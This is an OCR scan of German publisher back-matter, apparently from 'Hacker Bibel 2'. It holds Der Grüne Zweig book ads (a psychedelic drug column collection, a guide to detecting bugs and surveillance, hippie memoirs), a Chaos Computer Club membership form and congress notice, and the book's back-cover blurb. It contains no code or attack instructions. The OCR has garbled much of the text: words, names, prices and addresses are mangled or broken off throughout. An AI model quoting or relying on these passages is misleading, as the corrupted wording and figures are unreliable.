Achtung: Wir verteilen nur dpn Katalog, nicht die dort angebotenen 
Bücher, diese muß W\an direkt in den USA bestellen. 

Katalog A4, broschiert. 150 S^en, 5.— DM/SFR 


Ronald Rippchen 

HEITER WEITER 

Die gesammelten Kräuter-Pitlen-Drogen- 
Kolumnen aus der tax 

Oer Grüne Zweig 119 


Jochen Blumenthal 

DER ELEKTRONISCHE 
KAMMERJÄGER 

Erkennung von Wanzen, Spitzeln und Überwachung, 
sowie Tips für Schutzmaßnahmen 

Der Grüne Zweig 122 

Gibt es Gründe, sich in diesem Land verfolgt zu fühlen? Wert 
Telefone abgehörl? Schlösser und Codes geknackt? 

Wenn ja. woran kann man die Spitzel und ihre Wanzen erkenn 
was dagegen unternehmen? 

Jochen Blumenthal hat sich die Mühe gemacht, Bespitzelurn 
mögiichkeiten auszuloten und in einer auch für den technlsci 
Laien verständlichen Sprache zu erklären. Blumenthal. Autor < 
Bücher Das Große Minispion Baubuch und Computer und Abi 
ren, ist ein Betroffener, hat man Ihm doch übel mitgespielt- mi 
rere Razzien und Knastaufenlhalte motivierten Ihn zur gründlicf 
Recherche. „Es geht mir darum. Möglichkeiten und Methoden 
zeigen und wie man sich dagegen wehren bzw. Ihre Anwendu 
wesentlich erschweren kann.“ 

Die Themen reichen von Kommentaren zum neuen Fernmelde! 
lagengesetz über (humane) Erklärungen der „Hochfrequenz“ *1 
hin zu Wanzenerklärungen und -verstecken. Als Zugabe gibt 
noch Tips zur Chiffrierung persönlichster Daten. 


64 Wochen lang füllte Sachbuchaulor R, Rippchen seine Drogen¬ 
bezogene Kolumne In der tages 2 eitung. Oie einzige Drogenko¬ 
lumne in einer Tageszeilung weltweit - die längste Kolumne in der 
Geschichte der (az. In diesem Büchlein sind nun jene Kolumnen 
vollständig dokumentiert. Dazu auch bislang unveröHentlichi© 
Texte von Mr. Rippchen und anderen zum Thema. Das Ganze 
auch noch heftig illuslrlert. 

Inhalt; • Kiffer-Fabeln • Tiere und Drogen ♦ Krieg dem Rauschgift 
• Designer Drogen • Dope Im Ostblock • MDMA, die Droge des 
Jahres • Suchtsloffltommlssion der UN • Leserfeedback • Weiter¬ 
führende Buchtips • Muslkllps für psychedelische Reisen. 

Der Autor mag weder Heroin noch Äppehvoi, Kokain oder 
Schnaps. Daher werden solche Stoffe auch in diesem Buch 
gemieden. Es geht um Aufklärung über psychedelische Drogen - 
weder eine Verherrlichung, noch eine Verteufelung - und um zelt¬ 
gerechte Infos über Haschisch, MDMA. LSD und Artvenvandtes. 
„Was für ein wundervolles Buch! Ich bewundere Ronald Rippchen, 
er ist ein glänzendes Beispiel eines Kyber-Heros. Ich bin glücklich, 
daß wir Freunde sind und zusammen 'fliegen'”, meint Altmeister 
Timothy Leary zum Inhalt dieses Buches, ln der Tat! 

ISBN 3-925817-19-0 lOOSeiten 10 DM/SFR 

NIcholas Albery 

GENERALPROBE 
FÜR DAS JAHR 2000 

Drogen, Hausbesetzer, Rechtsverdrehungen, 
Alternativsteuern, Liebe, Sekten, Visionen, Alternatives 
Radio, Festivals und Mondenergie 

Der Grüne Zweig 90 


ISBN 3-925817-22-0 


70 Selten 


10DM/S 


OAS SCHUSS BUC 

msTime, mma, msoneusi 

Mmmicm Hkali 



M« e»ffVt IWllQ ,21 


Werner Pieper 

DAS SCHEiSSBUCH 

Entstehung, Nutzung und Entsorgung 


•Drogen • Religion • Spinnereien • Kommunen • Ijebe • Visionen Der Grüne ZweiQ 
... Nicholas Albery arbeitet wahrhaft alternativ: viel Maloche, viel 
Phantasie, viel Schlllzohrigkelt. viel Kommunikation & keine Kohle. 


Viele seiner Aktivitäten In London färbten auch auf Deutschland 
ab: alternatives Steuersystem. Freistaal Freslonla, die ersten Glo¬ 
betrotterbücher, ja auch die GRÜNEN ZWEIGE sind von Impulsen 
Albery's beseelt. 

Übersetzt von Werner Pieper. 

„... Hunderte von Möglichkeiten angepriesen, wie man ohne eine 
müde Mark Innerslädtisch schlafen, essen und umherschweifen 
könne. Als radikaler Robin Hood der Neuzeit, mit Milchpulver und 
Honig bewaffnet, reiste Nicholas Albery später quer durch die 
internationale Landkommunen-Krischna-Szene, inszenierte Pira¬ 
tensender und Free Festivals urid zog sich schließlich in einen ori¬ 
ginal-britischen Pferdewagen zurück, mit dem er monatelang 
durch Wales kutschierte, um aul diesem ganz speziellen Trip sei¬ 
nen längst fälligen Hippie-Klassiker GENERALPROBE FÜR DAS 
JAHR 2000 zu schreiben ... Summa Summarum sind Alberys 
Erlebnisse ein Dokument, das nicht ganz so ausgeflippt ist wie die 
Freak-Brothers-Geschtchten, dafür aber die deutsche APO-Gene- 
ration um einiges an Ausgeflipptheit übertrifft “ (tip 2/B4j 

. Alberys Ideenquell scheint einfach nicht zu versiegen ... eine der¬ 
art ausgeprägte Art des Konsurnverzichts plus sozialer Aktivitäten 
habe ich noch nicht erlebt.“ ftaz) 

„Nicholas Albery Ist eine der zentr.ilon Figuren in der Goscliichte 
der engKsetmn Alternaliv-Bewegung. Albery selbst beschreibt 
sein Buch als einen .verblüffenden Augenzeugenbericht der 
Geschichte der Alternativgesellschatt von 1968 bis 1975'.'' (aus: 
Peace News. London) 

258 Selten nur 9.ß0 DM/SFR 



ECHT ÄTZEND! 

7 WARNUNGS-STICKER 

Der Grün© Zweig 114 


VORSICHT .ASSE - GESUNOHeTtsSCHADL.CH " 

Finale 

7 AulM obo,^ 






CcC 

Chaos Chaos 


Computer 

Club 

eingetragener Verein für 

User, Hackerund Datenreisende 

*Leitsfelle eVa, Schwenckestr. 85, D-2000 Hamburg 20* 

DER CHAOS COMPUTER CLUB STELLT SICH VOR AUF 
SEITE 137 IN DIESER HACKERBIBEL - ALSO 2URÜCK- 
BLAiTTERN 

Mitgliedschaft kann in der Leilstelle eVa beantragt werden. 
Anträge werden für Einzelpersonen oder Gruppen angenom¬ 
men. Fördernde Mitglieder unterstützen den intergalaktischen 
Patrouillendienst am Rande der Unkenntlichkeit. 

Der CCC-lnformationsdienst wird aktiv, sobald Anmeldung 
und V-Scheck (oder Briefmarken) im Chaos-Dienst der Leit- 
stelle eVa angekommen sind. Größere Förderabos vorher 
ankündigen, damit der CCC rechtzeitig reagieren kann. 

Beiträge zur Förderung des CCC 

.cccVW 20 DM. Aufnahmegebühr (einmalig lOt 

Verwaltung) gewünschte Leit¬ 
stellennummer: .(*) 

.cccFI ab 230 DM. Förderndes Mitglied bis 29 . 2.88 

. cccNI 120 DM.,... Normales Mitglied bis 29.2.88 

. cccSI 60 DM . Schüler u. ä. bis 29,2.88 

. eceSO 30 DM. Schüler u. ä. bis 31.8.87 

naturgemäß portofrei und unverpackbar 
Chaos-Jahr endet mit Schaltjahr oder nicht. 

(■) Leitslellennummer umfaBt mind. i Ziflern. Stelle 1 + 2 isiTel-Vorwahl HH 40. 
Berlin 30. Kiel 43 usw.. Wünsche werden nach Möglichkeit erfüllt. 


Communication 

Congress 

Die Europäische Hackerparty 
immer zwischen den Jahren am letzten 
Wochenende des Jahres 


Eidelstedter Bürgerhaus, 
Elbgaustraße 12, 2000 Hamburg 54 


Das Treffen für Datenreisende! 
Telefon, Datex, Btx, Telex, 
Mailboxbetrieb, Datenfunk, 
Videovorführung. 

Aktive Workshops, Video- & Papercopiers 


Eintritt: Mitglieder 20 DM 

Private Kongressteilnehmer 30 DM 

Presse 50 DM 

Gewerbliche Teilnehmer 100 DM 


Voranmeldung durch Überweisung 
auf Postgiro 551257/204 PschA Hamburg 
Sonderkonto C./S. Wernery 


die Datenschleuder 



Das wissenschaftliche Fachblatt für Datenreisende /n 

Ein Organ des Chaos Computer Club HH “l 

Redaktion Datenschleuder, Schwenkestr. 85, 2000 Hamburg 20. Redaktionstreff donnerstags 19 Uhr 

























HA C K ER 

DAS MEIE 


B I B E L 2 


TESTAMENT 

HRSG. CHAOS COMPUIEB CLHB • DER GRÜHE ZWEIG 124 


Hacker sind keine vorüberge¬ 
hende Modeerscheinung wie 
Punks oder Juppies. Hacker 
sind eine feste Größe in einer 
menschlichen Zukunft. 

Seit dem Erscheinen von 
HACKER BIBEL I haben 
die fungs vom Chaos Com¬ 
puter Club durch ihre Aktio¬ 
nen immer wieder die Schlag¬ 
zeilen der Weltpresse erobert. 
In diesem Buch werden ihre 
Taten dokumentiert, hier 
klären sie den Leser über ihre 
Motivationen auf: vom NA¬ 
SA Hack, über die Viren- 
Gefahr, Netzwerk Hoffnun¬ 
gen und die Hacker Ethik. 


AUS DEM INHAIT; 

DIE VDILSIÄHDIGEH ADSGABEH 
DER DATEHSCHLEUDER, DD. I3-2S 
FAKSIMILIERT • DOKDMEHTATIOH 
DES HIREH FORDMS • PDETRDHIG 
TALKS • DIE ZEIT DES IHDIAHER- 
SPIELEHS IST VORBEI • HACKER IH 
HAFT DIE TECHHIK IH DIE SCHRAHKEH WEISER 
STRAHLEHDE COMPUTER • REALITY HACKERS 
UHD CYRER PUHKS • ... AUF EDV-FACHFRAU 
UMCESCHULT »MEGA RRAIH MIT MIHI-MASCHI- 
HEH • ZUR LAGE DER HATIOH IM GETEILTER FIZ 
DEDTSGHLAHD • SATELLITEH UHDSCHÜSSELH* 
DATEH: AUFZUCHT a PFLEGE • DATCH MAGIC • 
GO STOP GO • KREATIVES UHD KOHSTRUKTIVES 
CHAOS EH MASSE • 


INTEN lEN AUTSNEN; DIVENSE MIT6LIEDEN DES CNAOS 
eOMPDTED CIDDS, Z.D. STEFFEN WERNEIY, IR. WAN 
N.V.A.M. •JISEPI WEIZENIADM • PETER GIASEI • MINIS 
DELTA T «TIM LEARY • POETDDNIC • NANS GLISS • DIETER 
SCNHMACNER ‘ MARIA NEFF-UTNDFF • DERIIAN DRECIEI 


- -^ -- 


326niA \3CQi5 L264971 
T159CC 33 ,33 
^^C^£:•cIE£L 2.LIS KEcfc IE 

SS.13 DM. SFR ; 2t tt Mi** i